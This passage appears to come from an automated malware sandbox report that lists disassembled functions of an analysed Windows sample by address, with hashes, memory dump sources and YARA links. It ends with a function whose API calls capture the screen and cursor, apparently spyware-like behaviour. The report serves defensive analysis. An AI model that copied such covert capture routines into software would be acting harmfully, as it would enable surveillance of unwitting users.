                                                          • Opcode Fuzzy Hash: 277f5b14ebfb31d9acdfcb19b599133ffeee57438103c682c3dacb2c81b16d7f
                                                          • Instruction Fuzzy Hash: 75416771A087158FC314CE29C48162BFBE1FFC8310F648A1EF98693350D679E984CB86
                                                          Function 00437360 Relevance: 1.3, Strings: 1, Instructions: 76COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: NG
                                                          • API String ID: 0-1651712548
                                                          • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                          • Instruction ID: 1c32571a3dfe778fa5c185cf8bc6913e7641393edb8458615b62c9d9f031e262
                                                          • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                          • Instruction Fuzzy Hash: AA11E6F724C08243D635862DC4B46BBA795EBCD321F2C626BDCC24B758D23AA945F908
                                                          Function 0044EB3E Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: HeapProcess
                                                          • String ID:
                                                          • API String ID: 54951025-0
                                                          • Opcode ID: 92e8274eb45f99ac31ca5a7841fd9c067bc26919afa491827186e59168ab32af
                                                          • Instruction ID: 07883168748708d5871df038b293f30180ed36dce4f2d3eb69edcdcf819b44e4
                                                          • Opcode Fuzzy Hash: 92e8274eb45f99ac31ca5a7841fd9c067bc26919afa491827186e59168ab32af
                                                          • Instruction Fuzzy Hash: 8EA01130202202CBA3008F32AB0A20A3BA8AA00AA23028038A00AC02A0EE2080808A08
                                                          Function 0044C949 Relevance: .6, Instructions: 637COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: daa15e32a72831e46b3c61932d047b022fcf8146eeed5cebd1c5d41c65fd85a6
                                                          • Instruction ID: 9a438bc9e2fc22055b190f670ef66c3370438dec1b294d2ef7e2678560d22162
                                                          • Opcode Fuzzy Hash: daa15e32a72831e46b3c61932d047b022fcf8146eeed5cebd1c5d41c65fd85a6
                                                          • Instruction Fuzzy Hash: BE325721D29F014DE7279A35C8623366689AFBB3C5F14D737F819B5AA6EF2CC5830105
                                                          Function 0041E7EA Relevance: .6, Instructions: 606COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7f4af8b37f4defc4199b161d53b4d96f103fc90b589b5ac19ca4300a5eebd0f3
                                                          • Instruction ID: c1435a2baeed09a5a3259e0536aa218d1a742a19b3e0efe55a8499c03c4c3cac
                                                          • Opcode Fuzzy Hash: 7f4af8b37f4defc4199b161d53b4d96f103fc90b589b5ac19ca4300a5eebd0f3
                                                          • Instruction Fuzzy Hash: C332A1756087569BC715DF2AC4807ABB7E1BF84304F044A2EFC958B381D778DD868B8A
                                                          Function 004269D6 Relevance: .4, Instructions: 437COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 49923ba0373965d58fe21e3a4a04a2e805efb906394084f823fc6768166e364a
                                                          • Instruction ID: ba505550dfe6ff667973af58f2e26a28558ab2450a604d8934fff0a0de9d4b4c
                                                          • Opcode Fuzzy Hash: 49923ba0373965d58fe21e3a4a04a2e805efb906394084f823fc6768166e364a
                                                          • Instruction Fuzzy Hash: E002A071B145528FE318CF2EEC90536B7E1AB8D301745867EE486C7381EB74E922CB99
                                                          Function 0042645F Relevance: .4, Instructions: 377COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 14f2c04f30688e9b56e2fb3764798841ed8a236a41f0f424bf7fd8b45a1b82b0
                                                          • Instruction ID: 5a71f349ba3f9fd68778d37660bff7a0658bdf00a392eb754e277e7013b3f26f
                                                          • Opcode Fuzzy Hash: 14f2c04f30688e9b56e2fb3764798841ed8a236a41f0f424bf7fd8b45a1b82b0
                                                          • Instruction Fuzzy Hash: 01F17171A142558FD304DF1DE89187B73E4FB89301B44092EF183D7391DA74EA19CBAA
                                                          Function 00431582 Relevance: .4, Instructions: 371COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a8269e18aa3b2fd96c1213e9b8022c4c073f53bdae2f6b844dfaaafdf28db3f1
                                                          • Instruction ID: a41bb019b54bfded01c7b41d156f95a2cbb072d1dd28d49048bf85c092e0f3ee
                                                          • Opcode Fuzzy Hash: a8269e18aa3b2fd96c1213e9b8022c4c073f53bdae2f6b844dfaaafdf28db3f1
                                                          • Instruction Fuzzy Hash: 27D191B1A083158BC721DE69C490A5FB7E4BF88354F445A2EF8D597321E738DE09CB86
                                                          Function 0041D27C Relevance: .3, Instructions: 276COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e7326b31f45d4e50c8c50174bee11f9882207dfed74e31d12f4697374e1987de
                                                          • Instruction ID: 3c41eba25cca95e3826e3c7b6cd4dae3ec9239a5c93a684b18aa23140a28fc10
                                                          • Opcode Fuzzy Hash: e7326b31f45d4e50c8c50174bee11f9882207dfed74e31d12f4697374e1987de
                                                          • Instruction Fuzzy Hash: A9B184795142998ACB05EF68C4913F63BA1EF6A300F0851B9EC9CCF757D3398506EB64
                                                          Function 00436C9D Relevance: .3, Instructions: 254COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                          • Instruction ID: ead0cef3b0fda5c4522f49b9ed51e98e8a5165699e21cbc4f344a2de8f03cfd9
                                                          • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                          • Instruction Fuzzy Hash: FF9198722090A35DDB29423E843403FFFE15A563A1B1B679FE4F3CB2C5ED28C5699624
                                                          Function 00436F58 Relevance: .2, Instructions: 244COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                          • Instruction ID: 3a5f3f28e05ced0c476ae62a9fbfc87eb2deb37e5825eaa5068885373994e230
                                                          • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                          • Instruction Fuzzy Hash: 5B9154B310C0E349DB3D4639847403FFEF15A563A1B1A679FE4F2CA2C5EE288565D624
                                                          Function 004369D6 Relevance: .2, Instructions: 240COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                          • Instruction ID: eb820b35a2641912eb9ff5d16cdfa81a50ceb30e04b2f4d47c9798fb0fa66f46
                                                          • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                          • Instruction Fuzzy Hash: 3491A7722090A31DDB2D4639843403FFFE15A563A1B1BA79FD4F2CB2C5ED28D964DA24
                                                          Function 0043D04B Relevance: .2, Instructions: 237COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 364cc13a289dc0ce81a78afd7db0cdc41a28cfc106a277fbe5b23d2174104350
                                                          • Instruction ID: 3cf18c0d826463afbe89e475a5c7b17f33369b7a6d620af3ef40d0ad4ead64e4
                                                          • Opcode Fuzzy Hash: 364cc13a289dc0ce81a78afd7db0cdc41a28cfc106a277fbe5b23d2174104350
                                                          • Instruction Fuzzy Hash: 10615771E0060867EE386968B856BBF23A4AF4DB18F14341BE843DB385D65DDD43835E
                                                          Function 0043D2A8 Relevance: .2, Instructions: 237COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e08550926610149d2907a64cdab228bdd5846e9e2727ceec6c104fc9914690c2
                                                          • Instruction ID: b9fa1b0b40c6464c7c23e4f783a2c4cc8d7b3f542efc6a4ce67a7e3fa50c54dc
                                                          • Opcode Fuzzy Hash: e08550926610149d2907a64cdab228bdd5846e9e2727ceec6c104fc9914690c2
                                                          • Instruction Fuzzy Hash: 596136B1E0060896DB385A28B8967BF2398EB5D304F14351BEC83DB381D66DED46875F
                                                          Function 0043672C Relevance: .2, Instructions: 232COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                          • Instruction ID: 7b3a2e63247afe9edf549f88f25df29c5744deddbf3acd7c38ddff1b86da152b
                                                          • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                          • Instruction Fuzzy Hash: A081C9B21090A31DDB2D423A853413FFFE15E553A1B1BA79FD4F2CA2C5EE28C564D624
                                                          Function 0043CBED Relevance: .2, Instructions: 214COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                                          • Instruction ID: cee5e8aa058cab72f47c1252862074b7a33edcf92ba99b8242ad85c8d79f7feb
                                                          • Opcode Fuzzy Hash: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                                          • Instruction Fuzzy Hash: 6A51787160060857DB395A6885D67BF2B899B0E344F18742FE48BFB382C60DED12D39E
                                                          Function 0043CE1C Relevance: .2, Instructions: 214COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                                          • Instruction ID: a1764f4878c0090f3dddee11b9fa4dd44c6bcaf443cdbc9a7423fc55b8fdb92d
                                                          • Opcode Fuzzy Hash: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                                          • Instruction Fuzzy Hash: 285138616407049BDB38856884DB7BF679A9B5E704F18390FE486F73C2C60DEE06875E
                                                          Function 004271B8 Relevance: .2, Instructions: 186COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1c779f12f611b8dda6e5ae50ec22da61f8b8ae12354eff81384336edfcffc5bc
                                                          • Instruction ID: b54697577a8b4caa58ab057165119fb3c01a9d9d25aa48dfc33613f80cd324c0
                                                          • Opcode Fuzzy Hash: 1c779f12f611b8dda6e5ae50ec22da61f8b8ae12354eff81384336edfcffc5bc
                                                          • Instruction Fuzzy Hash: D2616D32A0C3059FC308DF75E581A5BB7E5BFCC718F910D1EF4899A151E634EA088B96
                                                          Function 00418195 Relevance: 52.8, APIs: 29, Strings: 1, Instructions: 324windowmemoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004181AF
                                                          • CreateCompatibleDC.GDI32(00000000), ref: 004181BA
                                                            • Part of subcall function 00418648: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00418678
                                                          • CreateCompatibleBitmap.GDI32(?,00000000), ref: 0041823B
                                                          • DeleteDC.GDI32(?), ref: 00418253
                                                          • DeleteDC.GDI32(00000000), ref: 00418256
                                                          • SelectObject.GDI32(00000000,00000000), ref: 00418261
                                                          • StretchBlt.GDI32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00CC0020), ref: 00418289
                                                          • GetCursorInfo.USER32(?), ref: 004182AB
                                                          • GetIconInfo.USER32(?,?), ref: 004182C1
                                                          • DeleteObject.GDI32(?), ref: 004182F0
                                                          • DeleteObject.GDI32(?), ref: 004182FD
                                                          • DrawIcon.USER32(00000000,?,?,?), ref: 0041830A
                                                          • BitBlt.GDI32(00000000,00000000,00000000,00000000,?,?,00000000,00000000,00660046), ref: 0041833A
                                                          • GetObjectA.GDI32(?,00000018,?), ref: 00418369
                                                          • LocalAlloc.KERNEL32(00000040,00000028), ref: 004183B2
                                                          • LocalAlloc.KERNEL32(00000040,00000001), ref: 004183D5
                                                          • GlobalAlloc.KERNEL32(00000000,?), ref: 0041843E
                                                          • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00418461
                                                          • DeleteDC.GDI32(?), ref: 00418475
                                                          • DeleteDC.GDI32(00000000), ref: 00418478
                                                          • DeleteObject.GDI32(00000000), ref: 0041847B
                                                          • GlobalFree.KERNEL32(00CC0020), ref: 00418486
                                                          • DeleteObject.GDI32(00000000), ref: 0041853A
                                                          • GlobalFree.KERNEL32(?), ref: 00418541
                                                          • DeleteDC.GDI32(?), ref: 00418551
                                                          • DeleteDC.GDI32(00000000), ref: 0041855C
                                                          • DeleteDC.GDI32(?), ref: 0041858E
                                                          • DeleteDC.GDI32(00000000), ref: 00418591
                                                          • DeleteObject.GDI32(?), ref: 00418597
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
